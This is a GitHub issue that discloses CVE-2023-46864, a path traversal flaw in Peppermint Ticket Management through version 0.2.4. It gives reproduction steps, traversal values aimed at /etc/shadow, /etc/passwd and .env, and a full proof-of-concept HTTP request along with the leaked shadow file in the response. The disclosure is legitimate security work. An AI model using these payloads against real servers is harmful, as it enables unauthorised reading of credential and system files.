CVE-2023-46864: Path Traversal - Arbitrary File Download · Issue #171 · Peppermint-Lab/peppermint

Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=../ POST request.


Description

When downloading a file attached to a ticket, it was possible to download arbitrary files from the web server, because the filepath query parameter is not validated and is passed directly to fs.createReadStream. The latest release was downloaded and run by following the instructions here: https://github.com/Peppermint-Lab/peppermint/tree/master#-installation-with-docker

Steps to Reproduce

  1. Login to the application.
  2. Create a new ticket.
  3. Upload a file.
  4. Download the file and intercept the request in Burp Suite.
  5. Change the filepath parameter to “../../../../../../etc/shadow” or “../../../../../../etc/passwd” or “./.env”

Proof of Concept Request and Response

Request:

POST /api/v1/ticket/1/file/download?filepath=../../../../../../etc/shadow HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.00) Gecko/20100101 Firefox/118.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:5000/ticket/1
Content-Type: multipart/form-data; boundary=---------------------------9995410711832151211174726991
Content-Length: 61
Origin: http://localhost:5000
Connection: close
Cookie: token=<omitted>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------9995410711832151211174726991--

Response:

HTTP/1.1 200 OK
Date: Sat, 14 Oct 2023 23:28:05 GMT
Connection: close
Content-Length: 476

root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
node:!:<omitted for security>
nextjs:!:<omitted for security>

Impact

This allows application users to download system files such as /etc/passwd and /etc/shadow, configuration files, application source code, and other users' files. Both the /etc/shadow file and the application's .env file were retrieved through the app.

References

https://cwe.mitre.org/data/definitions/22.html
https://portswigger.net/web-security/file-path-traversal
